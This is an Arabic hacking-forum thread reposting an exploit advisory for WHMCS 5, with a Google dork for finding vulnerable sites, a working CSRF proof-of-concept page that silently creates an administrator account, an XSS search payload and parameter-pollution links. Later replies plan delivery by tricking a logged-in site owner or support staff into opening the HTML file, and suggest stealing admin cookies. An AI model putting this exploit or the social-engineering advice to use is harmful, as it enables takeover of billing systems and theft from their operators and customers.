حالة الموضوع:
مغلق
  1. Abo MalaK

    Abo MalaK Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    السلام عليكيم
    ########
    # Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
    # Version: Latest version 5.1 and other previous version maybe vulnerable
    # Vendor: WHMCS - The Complete Client Management, Billing Support Solution
    # Date: 2012-05-30
    # Tested on: win/linux
    # Author/Found by: Shadman Tanjim
    # Email: shadman2600gmail.com
    # Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
    # Special Thanks: x8631p
    # Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
    ##########

    CSRF Vulnerability:

    Get:
    http://site.com/clientarea.php
    http://site.com/admin/index.php
    http://site.com/admin/login.php

    Post:
    http://site.com/admin/login.php
    http://site.com/cart.php
    http://site.com/admin/configadmins.php
    http://site.com/pwreset.php


    p0c:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <h2>WHMCS CSRF ExpL0iT PoC</h2>
    </head>
    <script language="javascript" type="text/javascript" >

    function lifeissimple() {

    var token = "Token Value";

    var img = document.createElement("img");
    var site="http://www.localhost.com:80";
    var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token +
    "&roleid=1&firstname=dead&lastname=cow&email=deadc [email protected]&username=deadcow&password=
    deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend
    &language=English";
    img.setAttribute("src", requesturl);
    document.body.appendChild(img);

    var img2 = document.createElement("img");
    img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");
    document.body.appendChild(img);
    }

    </script>
    <body onload="lifeissimple();">

    </body>
    </html>


    Cross-site Scripting (XSS) Vulnerability:

    request:pOST http://site.com/knowledgebase.php?action=search HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    search='%20onerror%3D'f(PSRyh)


    HTTP Parameter Pollution :

    1.Affected link: http://site.com/cart.php?a=add&domai...913620=v992636
    Affected parameter: a=add

    2. Affected link: http://site.com/domainchecker.php?se...946774=v992350
    Affected parameter: search=bulkregister

    3. Affected link: http://site.com/cart.php?currency=2&...972751=v976696
    Affected parameter: currency=2

    المصدر :

    http://cxsecurity.com/issue/WLB-2012050220

    الثغرة تسمح لك بإضافة أدمن ..i:q2^:

    أو سحب الكوكيز تبعو ..)2:"

    لسا ماجربتها .. هلئ شفتها وحبيت شاركن فيها
    قريبا نشالله بجربها و بشرحها ..&:"
     
  2. D-Zoro

    D-Zoro Developer

    الأنتساب:
    ‏14 يونيو 2012
    المشاركات:
    11
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    مـصـ|القاهرة|ـــر
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    هذه الثغرة لازمها هندسة اجتماعيةi:q4^:

    يعني ترسل لصاحب الموقع ملف html الخاص بالثغرة مرفوع او

    ما شبه و عليه هو بدوره ان يكون مسجل الدخول:!."

    بعد ان يفتح الملف سيعمل تلقائيا و يضيف ادمن
    #:"​
     
  3. amin

    amin Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    15
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    <,,,<,,,<
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    يوجد توكين حبيبي في سكربت whmcs ​
     
  4. Anti-Trust

    Anti-Trust Developer

    الأنتساب:
    ‏12 مايو 2012
    المشاركات:
    15
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    w00t
    الإقامة:
    jordan
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    شوي اسلوب هندسة اجتماعية


    وافكار راح تمشيها وراح ينضاف الادمن تلاقي
     
  5. Abo MalaK

    Abo MalaK Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability



    طبعا الثغرة تحتاج لهندسة إجتماعية

    بس مابتوقع أنها مشكلة بهيك نوع

    من السكريبات (لدعم الفني ) تقدر تراسل الشركة وتئولهم

    إنو بدك تنئل هالموقع لعندهم .. والأفكار كتيرة &:"

    بالنسبة لنوعها .. فالأنسب أنك تسحب الكوكيز فيها ..


    بدل ماتستعملها csrf لأنو ممكن الستاف

    مايكون عنده صلاحية يضيف أدمن ..

    نورتو الموضوع ياشباب
     
  6. vŀяύš

    vŀяύš V • I • P

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    Thank You Man
     
  7. mr.mourad

    mr.mourad <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏8 يوليو 2013
    المشاركات:
    170
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

    يعطيك الف الف العافية اخي شكراً جزيلاً على الطرح :{1}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة